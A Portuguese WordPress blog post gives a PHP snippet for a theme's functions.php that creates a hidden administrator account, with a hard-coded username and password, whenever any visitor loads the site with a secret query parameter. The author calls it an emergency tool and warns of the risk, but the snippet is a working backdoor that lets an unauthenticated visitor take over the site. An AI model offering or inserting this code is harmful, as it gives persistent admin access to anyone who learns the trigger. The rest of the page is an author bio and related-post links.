Backdoor para criação de novo administrador

Publicado em

Adicione o código abaixo no arquivo functions.php de seu tema WordPress para criar um backdoor que crie um novo usuário administrador, para ser usado em emergências.

add_action(‘wp_head’, ‘meu_backdoor’);

function meu_backdoor() {
If ($_GET[‘backdoor’] == ‘novoadmin’) {
require(‘wp-includes/registration.php’);
If (!username_exists(‘AdminNovo’)) {
$user_id = wp_create_user(‘AdminNovo’, ‘SenhaDoUsuario’);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}
}
}

Para ativar tal função, basta acessar o endereço https://www.meusite.com.br?backdoor=novoadmin

Logicamente, você deve alterar o usuário ‘AdminNovo’ e senha ‘SenhaDoUsuario’ na linha $user_id. Aconselho também a trocar o nome da função de ‘novoadmin’ para algo que só você saiba.

Lembre-se que usar esse código pode ser considerado um risco de segurança, qualquer um poderia facilmente executar essa função, chamando o querystring correta, por isso a necessidade de a alterar e usar parâmetros que só você saiba, como costumamos fazer com nossas senhas e dados sigilosos.

Use este código apenas para o bem, para você mesmo, ok ?

Especialista em WordPress & SEO

Desbravando o mundo WordPress desde 2007, me especializei também em SEO e entreguei grandes projetos no mercado brasileiro para a partir de 2015 me dedicar ao mercado fora do Brasil. Trabalhei na empresa do criador do WordPress por 4 anos (no WordPress.com, da Automattic) e mais 4 anos em uma das maiores empresas de hospedagens do mundo, a Liquid Web, gerenciando uma equipe de suporte do plugin The Events Calendar.

No Brasil, atendi grandes marcas como canal Futura, Corpo Perfeito, Catraca Livre, Hostgator Brasil e Hostnet, também palestrei em diversos eventos e dei aula em cursos livres e pós-graduação (no Rio de Janeiro e em Brasília).

Trabalho remoto, viajo bastante, mas minha base é no Rio de Janeiro/RJ.

Posts Similares

  • Quanto tempo devo esperar para atualizar meu WordPress?

    Atualizado em

    Com o lançamento do novas versões do WordPress, ouvimos vários relatos de complicações na atualização e erros acontecidos.. Eu mesmo já sofri um pouco com isso, na era do WordPress 2.X, e tais erros sempre geram alguma repercussão na comunidade de usuários do WordPress, principalmente fora do Brasil, como pude acompanhar.. A grande pergunta feita…

  • Como encontrar o ID de suas páginas?

    Atualizado em

    Você precisa encontrar um ID de página ou post do WordPress, mas não sabe onde estão? Neste artigo você aprenderá um método fácil para visualizar IDs de páginas e postagens no painel do WordPress – sem usar plugins ou qualquer outro recurso adicional. O que são IDs de páginas e posts do WordPress? Cada conteúdo…

  • Como traduzir temas e plugins?

    Atualizado em

    Quem lida com o WordPress provavelmente já traduziu um tema, simplesmente buscando por strings nos arquivos e substituindo pelo equivalente em português. Isso é simples (até certo ponto) e eficaz, mas o WP oferece um sistema de tradução nativo, baseado no GNU Gettext. Verdade que muitos desenvolvedores não dão a menor bola para isso, mas…

  • Segurança: Alterando o prefixo do Banco de Dados do WordPress

    Uma das coisas incríveis do WordPress é que ele é um sistema de publicação dinâmica, que utiliza um banco de dados para armazenar informações de seu site: posts, opções e configurações de plugins e temas – todos estes dados são armazenados no banco de dados do seu site. É como se fosse cérebro da sua…

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *